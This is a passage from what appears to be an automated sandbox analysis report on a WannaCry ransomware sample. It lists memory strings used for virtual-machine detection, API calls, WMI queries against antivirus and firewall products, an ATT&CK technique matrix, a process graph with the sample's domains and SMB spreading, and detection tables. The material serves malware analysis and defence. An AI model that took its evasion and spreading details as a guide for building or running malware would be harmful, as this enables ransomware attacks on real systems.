                  Source: tasksche.exe, 00000009.00000003.636360566.0000000005679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4
                  Source: tasksche.exe, 00000009.00000003.586272174.0000000005E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0
                  Source: tasksche.exe, 00000009.00000003.636360566.0000000005679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: tasksche.exe, 0000000A.00000003.329406653.0000000006982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_`
                  Source: tasksche.exe, 00000009.00000003.636793323.0000000005E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94fI
                  Source: svchost.exe, 00000011.00000002.767851294.000001E93A5B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: tasksche.exe, 00000009.00000003.657487416.0000000005679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}vwx
                  Source: mssecsvr.exe, 00000005.00000003.249372850.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, mssecsvr.exe, 00000005.00000002.256071268.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: tasksche.exe, 00000009.00000003.585626718.0000000005679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: tasksche.exe, 00000009.00000003.284671407.0000000000682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: tasksche.exe, 00000009.00000002.767752539.00000000055E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y4
                  Source: tasksche.exe, 00000009.00000002.768100584.0000000005679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
                  Source: tasksche.exe, 00000009.00000003.733992893.0000000005622000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53
                  Source: svchost.exe, 0000000B.00000002.765212282.000001E18C83C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.765594712.000002029A468000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.765193503.0000028849C29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: svchost.exe, 00000011.00000002.767851294.000001E93A5B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1L([:
                  Source: tasksche.exe, 0000000A.00000003.329406653.0000000006982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002_Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}om&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&]
                  Source: tasksche.exe, 00000009.00000003.284457972.0000000005583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instancelume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&9
                  Source: tasksche.exe, 00000009.00000003.636753728.0000000005642000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: tasksche.exe, 0000000A.00000002.767487904.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Prod_VMware_A
                  Source: tasksche.exe, 00000009.00000003.657646462.0000000005602000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22
                  Source: tasksche.exe, 00000009.00000003.560972276.0000000000679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}VV
                  Source: svchost.exe, 0000000B.00000002.764893489.000001E18C802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: mssecsvr.exe, 00000005.00000003.249372850.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, mssecsvr.exe, 00000005.00000002.256071268.0000000000C87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                  Source: tasksche.exe, 0000000A.00000003.329373229.000000000070F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q_VMware_$
                  Source: tasksche.exe, 00000009.00000003.430906638.0000000000682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dh#hSTORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: tasksche.exe, 0000000A.00000003.329406653.0000000006982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00409476 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,9_2_00409476
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040DE5E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,9_2_0040DE5E
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040CEB6 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040CEB6
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041E6DE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0041E6DE
                  Source: C:\Windows\tasksche.exeCode function: 9_2_004234CE SetUnhandledExceptionFilter,9_2_004234CE
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041E6DE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0041E6DE
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041FFDB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0041FFDB
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00423F89 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,9_2_00423F89
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1Jump to behavior
                  Source: C:\Windows\tasksche.exeCode function: GetLocaleInfoW,GetNumberFormatW,9_2_0040D155
                  Source: C:\Windows\tasksche.exeCode function: GetLocaleInfoA,9_2_00425EF0
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040CA52 cpuid 9_2_0040CA52
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040FEF0 OleInitialize,_memset,GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,LoadBitmapW,DialogBoxParamW,DeleteObject,DeleteObject,DeleteObject,CloseHandle,Sleep,OleUninitialize,9_2_0040FEF0
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00409C06 GetVersionExW,9_2_00409C06

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                  Source: svchost.exe, 00000011.00000002.767546870.000001E93A571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                  Source: svchost.exe, 00000012.00000002.765420071.0000015277102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\tasksche.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\tasksche.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\tasksche.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium3
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API
                  4
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory12
                  File and Directory Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  Exfiltration Over Bluetooth11
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts2
                  Command and Scripting Interpreter
                  Logon Script (Windows)4
                  Windows Service
                  2
                  Obfuscated Files or Information
                  Security Account Manager33
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Input Capture
                  Automated Exfiltration1
                  Non-Standard Port
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts2
                  Service Execution
                  Logon Script (Mac)11
                  Process Injection
                  2
                  Software Packing
                  NTDS1
                  Network Share Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer4
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets241
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits15
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  File Deletion
                  Cached Domain Credentials121
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items121
                  Masquerading
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job121
                  Virtualization/Sandbox Evasion
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
                  Process Injection
                  Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Rundll32
                  Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 771981 Sample: xIwkOnjSIa.dll Startdate: 22/12/2022 Architecture: WINDOWS Score: 100 81 Snort IDS alert for network traffic 2->81 83 Multi AV Scanner detection for domain / URL 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 8 other signatures 2->87 9 loaddll32.exe 1 2->9         started        11 mssecsvr.exe 15 2->11         started        15 svchost.exe 2->15         started        17 8 other processes 2->17 process3 dnsIp4 19 cmd.exe 1 9->19         started        21 rundll32.exe 9->21         started        24 rundll32.exe 1 9->24         started        27 conhost.exe 9->27         started        71 ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com 11->71 73 72.33.18.64, 445 WISC-MADISON-ASUS United States 11->73 75 101 other IPs or domains 11->75 99 Connects to many different private IPs via SMB (likely to spread or exploit) 11->99 101 Connects to many different private IPs (likely to spread or exploit) 11->101 103 Changes security center settings (notifications, updates, antivirus, firewall) 15->103 29 MpCmdRun.exe 15->29         started        105 Query firmware table information (likely to detect VMs) 17->105 signatures5 process6 file7 31 rundll32.exe 19->31         started        91 Drops executables to the windows directory (C:\Windows) and starts them 21->91 33 mssecsvr.exe 7 21->33         started        53 C:\Windows\mssecsvr.exe, PE32 24->53 dropped 38 conhost.exe 29->38         started        signatures8 process9 dnsIp10 40 mssecsvr.exe 7 31->40         started        59 ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com 33->59 61 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com 33->61 63 701602.parkingcrew.net 33->63 51 C:\WINDOWS\qeriuwjhrf (copy), PE32 33->51 dropped 89 Drops executables to the windows directory (C:\Windows) and starts them 33->89 45 tasksche.exe 15 33->45         started        file11 signatures12 process13 dnsIp14 65 ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com 40->65 67 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com 40->67 69 701602.parkingcrew.net 40->69 55 C:\Windows\tasksche.exe, PE32 40->55 dropped 93 Antivirus detection for dropped file 40->93 95 Multi AV Scanner detection for dropped file 40->95 97 Machine Learning detection for dropped file 40->97 47 tasksche.exe 5 20 40->47         started        file15 signatures16 process17 file18 57 C:\Windows\eee.exe, PE32 47->57 dropped 77 Antivirus detection for dropped file 47->77 79 Multi AV Scanner detection for dropped file 47->79 signatures19

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  xIwkOnjSIa.dll92%ReversingLabsWin32.Ransomware.WannaCry
                  xIwkOnjSIa.dll90%VirustotalBrowse
                  xIwkOnjSIa.dll100%AviraTR/AD.DPulsarShellcode.uvbfu
                  xIwkOnjSIa.dll100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Windows\mssecsvr.exe100%AviraTR/AD.DPulsarShellcode.grbmv
                  C:\Windows\tasksche.exe100%AviraTR/Rasftuby.cpsmo
                  C:\Windows\mssecsvr.exe100%Joe Sandbox ML
                  C:\Windows\eee.exe100%Joe Sandbox ML
                  C:\WINDOWS\qeriuwjhrf (copy)90%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Windows\eee.exe10%ReversingLabs
                  C:\Windows\mssecsvr.exe98%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Windows\tasksche.exe90%ReversingLabsWin32.Ransomware.WannaCry
                  SourceDetectionScannerLabelLinkDownload
                  8.2.mssecsvr.exe.400000.0.unpack100%AviraTR/Rasftuby.cpsmoDownload File
                  5.0.mssecsvr.exe.400000.2.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  7.2.mssecsvr.exe.24e2948.9.unpack100%AviraHEUR/AGEN.1215476Download File
                  7.2.mssecsvr.exe.1fab084.3.unpack100%AviraTR/Ransom.GenDownload File
                  8.0.mssecsvr.exe.400000.0.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  7.0.mssecsvr.exe.400000.0.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  5.0.mssecsvr.exe.400000.0.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  7.2.mssecsvr.exe.24d38c8.7.unpack100%AviraTR/Ransom.GenDownload File
                  8.0.mssecsvr.exe.400000.6.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  8.0.mssecsvr.exe.400000.2.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  8.0.mssecsvr.exe.400000.4.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  7.2.mssecsvr.exe.400000.0.unpack100%AviraTR/Rasftuby.cpsmoDownload File
                  7.2.mssecsvr.exe.1fba104.5.unpack100%AviraHEUR/AGEN.1215476Download File
                  5.0.mssecsvr.exe.400000.6.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  5.0.mssecsvr.exe.400000.4.unpack100%AviraTR/AD.DPulsarShellcode.grbmvDownload File
                  5.2.mssecsvr.exe.400000.0.unpack100%AviraTR/Rasftuby.cpsmoDownload File
                  SourceDetectionScannerLabelLink
                  www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com12%VirustotalBrowse
                  ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com10%VirustotalBrowse
                  ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com14%VirustotalBrowse
                  SourceDetectionScannerLabelLink
